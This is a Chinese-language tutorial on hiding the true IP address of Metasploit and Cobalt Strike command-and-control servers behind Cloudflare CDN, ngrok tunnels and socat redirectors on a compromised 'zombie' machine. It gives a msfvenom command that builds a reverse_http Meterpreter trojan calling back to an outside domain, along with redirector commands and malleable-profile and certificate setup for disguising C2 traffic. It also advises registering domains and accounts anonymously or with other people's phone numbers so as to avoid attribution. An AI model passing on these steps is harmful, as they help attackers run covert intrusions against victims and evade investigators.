Metasploit域名上线隐藏IP以及CobaltStrike上线隐藏IP

目录

概述

域名上线原理

CDN简介

CDN上线具体实现

Metasploit域名上线隐藏IP（CDN）

CobaltStrike上线隐藏IP

CobaltStrike隐藏ip（CDN）

CobaltStrike隐藏ip（隧道转发代理）

 隐藏cs流量

---

概述

为什么要隐藏IP在拿下了目标机之后，目标机在内网里面，使用msf或者CS时，用自己的VPS做服务器的话，导致很容易被溯源

域名上线原理

当我们访问域名时会经过域名解析 域名解析就是域名到IP地址的转换过程，那么就意味这我们访问域名实际上最后是访问的真实IP

A 记录： 将域名指向一个 IPv4 地址（例如： 100.100.100.100 ），需要增加 A 记录

CNAME 记录： 如果将域名指向一个域名，实现与被指向域名相同的访问效果，需要增加 CNAME 记录。这个域名一般是主机服

务商提供的一个域名

MX 记录： 建立电子邮箱服务，将指向邮件服务器地址，需要设置 MX 记录。建立邮箱时，一般会根据邮箱服务商提供的 MX 记

录填写此记录

NS 记录： 域名解析服务器记录，如果要将子域名指定某个域名服务器来解析，需要设置 NS 记录

TXT 记录： 可任意填写，可为空。一般做一些验证记录时会使用此项，如：做 SPF （反垃圾邮件）记录

AAAA 记录： 将主机名（或域名）指向一个 IPv6 地址（例如： ff03:0:0:0:0:0:0:c1 ），需要添加 AAAA 记录

假设 现在有一个域名 www.aaa.com 配置了A记录

那么我想让我的msf上线能达到隐藏真实IP的效果吗

域名最好买一个匿名国外的 ip买一个香港的 再通过cnd进行隐藏 因为在国内买域名会实名通过站长之家whois能查到相关信息 cdn网站最好也是使用别人手机号进行注册（接码平台）之后绑定域名

www.nsxt.world的Whois信息 , 站长工具 (chinaz.com)

CDN简介

CDN的全称是Content Delivery Network，即内容分发网络。其目的是通过在现有的Internet中增加一层新的CACHE(缓存)层，将网站的内容发布到最接近用户的网络”边缘“的节点，目的提高用户访问网站的先赢速 度 假设您的业务源站域名为 www.test.com ，当域名接入 CDN 开始使用加速服务后，您 的用户发起 HTTP 请求，实际的处理流程如图所示，根据他的处理流程，CDN最后会将流量转发到真实IP上， 那么我们便能通过CDN达到隐藏自身的效果

CDN上线具体实现

基础配置:一台VPS、一个域名这里的VPS最好是匿名的

既然是隐藏自身 那么域名肯定不能使用自己备案的域名

可以使用国外vps以及域名

https://freenom.com/ 注册免费域名 注册失败,可以用gmail注册

https://cart.godaddy.com/ 注册匿名域名

https://www.cloudflare.com/ 免费CDN

CDN步骤 最好是非实名注册一个账号 直接添加你的域名 推荐设置全点否 之后会弹出来让你修改你的DNS服务器  你需要登录注册域名的网站 找到DNS服务器 把你本身自带的DNS服务器修改为CDN给你的DNS服务器 等待即可 你再次ping你的域名的时候就不是你真正的ip了

注意

Cloudflare支持的HTTP端口是：

80,8080,8880,2052,2082,2086,2095

Cloudflare支持的HTTPs端口是：

443,2053,2083,2087,2096,8443

所以我们生成木马的时候 必须使用http的反弹shell模块 监听端口也必须是CDN支持的端口

Metasploit域名上线隐藏IP（CDN）

MSF生成木马

这里cs服务器使用的是公网带域名服务器

靶机用的是虚拟机windows10

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=www.nsxt.world LPORT=2095 -f exe >shell.exe

 

首先先使用msf生成木马

进入监听模块

设置payload 类型为刚刚生成木马文件的类型

设置监听地址为刚刚生成木马文件的lhost

设置监听地址为刚刚生成木马文件的lport

exploit -j 挂载到后台运行

我们这个时候在windows中执行木马 vps中就会得到反馈

我们使用wireshark进行抓包 发现 vps走的104.21.79.82 也就是CND的ip

CobaltStrike上线隐藏IP

CobaltStrike隐藏ip（CDN）

使用CDN内容分发网络的多节点分布式技术，通过“加速、代理、缓存”隐藏在后面的静态文件或服务；最终实现对外暴露的是CDN多节点的公网域名IP，很难甚至无法溯源真实后端服务器的域名或IP！

我们启动服务端

注意因为CDN不支持50050或者10010 所以只能填写公网ip不能填写域名

如果是正常腾讯云DNS解析 那么我们就可以使用域名去填写

新建一个CDN监视器 监视器里面我们就可以填写域名 不用填写ip地址了

http端口要设置为CND 支持的http端口！否则通过域名监听不到

创建一个无阶段木马

把无解段木马发送到虚拟机windows10 并且运行

这时我们就得到了windows权限

 

 我们查看以列表形式展示的对话

发现 靶机ip时172.23.19.129 服务器连接的ip为172.71.155.46 这就代表成功隐藏了公网ip 路线走的是CDN ip 达到了隐藏ip效果

 

发送sleep 0

 使用wirshark进行抓包

 追踪 数据流http（很明显的特征是cs cookie传参）host为www.nsxt.world

流量分析 观察流量信息会发现全程和CDN在做通信

CobaltStrike隐藏ip（隧道转发代理）

 

利用内网穿透，将C2回连端口映射到其他公网地址，以达到测试程序通过其他公网地址进行回连，隐藏C2真实ip

注册ngrok账号

https://ngrok.com/

使用说明 https://dashboard.ngrok.com/get-started/setup

下载ngrok 压缩文件 ->解压 ->修改ngrok权限-> 修改授权令牌

转发端口 ./ngrok tcp 10088

可以看到10088已经映射到 17936端口了

创建一个新的NGROK监听器 http地址要写NGROK提供的 也就是上图给出的 http端口也要写上图给出的NGROK端口 监听端口写 我们自己的端口10088

 

生成无阶段木马 并在靶机上运行

运行后事件日志里就可以看到 靶机上线了

并且发现他们的与cs服务端连接的地址是127.0.0.1 也就是本地地址 也就代表走的本地ngrok的地址

  抓取数据包 10.194.28.88 为我们运行木马的ip地址

这个 10.194.28.88 和18.177.76.42 持续连接

打开这个数据包发现 18.177.76.42 就是 0.tcp.jp.ngrok.io地址

 

隐藏ip成功 

CobaltStrike隐藏ip（转发重定向）

具体实现:一台vps：teamserver

                一台肉鸡：这里我们就是用自己的虚拟机172.23.19.153当肉鸡

socat 转发

常用选项

-lh 将主机名添加到日志消息

-v 详细数据流量，文本

-x 详细数据流量，十六进制

-d 增加详细程度（最多使用 4 次；建议使用 2 次）

-lf <logfile> 记录到文件

socat TCP4-LISTEN:80,fork TCP4:C2ip:80

socat -d -d -d -d -lh -v -lf /var/log/socat.log TCP4-LISTEN:80,fork TCP4:C2 服务器 ip:C2 服务器监听 Port

首先将靶机靶机（肉鸡）执行命令

解释:将此机器10086端口接受到的流量转发给49.234.38.224：10011

 设置监听器

生成无阶段木马 在自己本机中执行 并不是靶机执行

执行后在cs上就能得到反馈

并且发现 运行木马的机器ip为10.194.28.88

连接的ip是 124.93.196.28 这个ip就是肉鸡172.23.19.153出网ip

 

 

 隐藏cs流量

cs配置文件Profile

下载地址  在本地下载解压后 找到jquery-c2.4.4.profile 这个是你cs版本 如果是4.3就找4.3

https://github.com/threatexpress/malleable-c2/archive/refs/heads/master.zip

keystore的生成方法：去Cloudflare的SSL/TLS源服务器创建证书，使用默认配置生成pem和key

因为我们的vps域名是通过CDN上线的 所以我们要到官网上生成证书以及私钥复制证书创建txt导入，修改文件名为xxxx.pem复制私钥创建txt导入，修改文件名为xxxx.key 将创建的pem和key文件上传至云服务器。执行以下命令（www.xxx.com为申请的域名）

openssl pkcs12 -export -in xxxx.pem -inkey xxxx.key -out www.xxx.com.p12 -name www.xxx.com -passout pass:123456

 

keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore www.xxx.com.store -srckeystore www.xxx.com.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias www.xxx.com

 

把证书保存到 www.nsxt.world.pem

把私钥保存到www.nsxt.world.key

 

 

修改刚刚下载好的4.4配置文件

修改七个内容

3个 clien 3个server 1个账户密码

 

 

 

把修改好的配置文件拖拽到vps cs4.4目录里 使用 自带的c2lint 进行检查 首先要修改权限

 

 

修改CDN配置

在这个Profile中，我们请求的URI是以.js结尾的，Cloudflare作为一个CDN肯定要去缓存它，但这样的话请求就无法到达我们的CS服务器，自然也就无法上线了。使用开发模式并清除缓存。

启动cs，设置配置为修改好的profile

设置监听器 上线端口要修改为CDN能接受的http端口

 生成无阶段木马 运行木马文件后 等的时间有点长 耐心等待 就会得到权限

上图显示与10.194.28.88连接的ip是 172.69.22.63/172.69.134.197/172.69.134.196

 我们进行抓包 发现与本机10.194.28.88通信的是 104.21.79.82 也就是CDN